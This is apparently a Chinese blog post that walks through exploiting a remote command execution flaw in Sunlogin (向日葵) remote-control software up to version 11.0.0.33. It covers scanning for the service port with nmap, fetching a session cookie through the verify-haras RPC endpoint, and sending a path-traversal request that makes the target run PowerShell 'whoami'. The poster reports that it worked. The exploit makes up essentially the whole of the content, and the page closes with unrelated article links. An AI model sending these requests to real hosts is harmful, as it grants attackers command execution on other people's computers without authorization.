命令执行漏洞详解 - 向日葵命令执行
最编程
2024-07-14 17:22:39
...
1. 向日葵的版本是<=11.0.0.33版本的,
2. 打开向日葵,需要连接服务器成功
3. 打开之后会自动开启一个40000-60000之间随机的端口,此时使用kali的nmap进行探测
此时扫出来49408、49409、49410、49411、49413、49414、49415、49492这八个端口
4、探测向日葵的端口
在浏览器中访问目标的ip:以上端口,访问向日葵的端口时,会报出以下页面
此时确定端口为49492
5、获取cookie值
poc:
目标IP:端口/cgi-bin/rpc?action=verify-haras
成功获取cookie
6、拿到CID-添加payload和cookie-发送http://ip/check?cmd=ping…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami
实操成功
上一篇: PHP 代码/命令执行漏洞概述
推荐阅读
-
centos7执行yum命令时报:Could not resolve host: mirrorlist.centos.org;未知错误-解决方案:
-
使用 Qemu-Guest-Agent 传输文件、执行命令等--QEMU 简介
-
实时监控应用程序是否正在 Linux 中运行,如果没有,则执行运行命令。
-
入门指南:了解Shell脚本、探索其结构与执行、掌握date命令的使用,并深入了解脚本中的变量
-
如何在Windows上为VSCode设置执行Shell命令的功能
-
‘adb’不是内置命令、外部指令,也无法执行:提供解决方法
-
Java 实现Shell命令执行与日志收集的实用技巧与注意事项
-
在Python 3中执行命令行操作的多种方法
-
在Python中实现多种执行Shell命令的方式探索
-
如何在 Linux 中连续执行多个命令(实用技巧)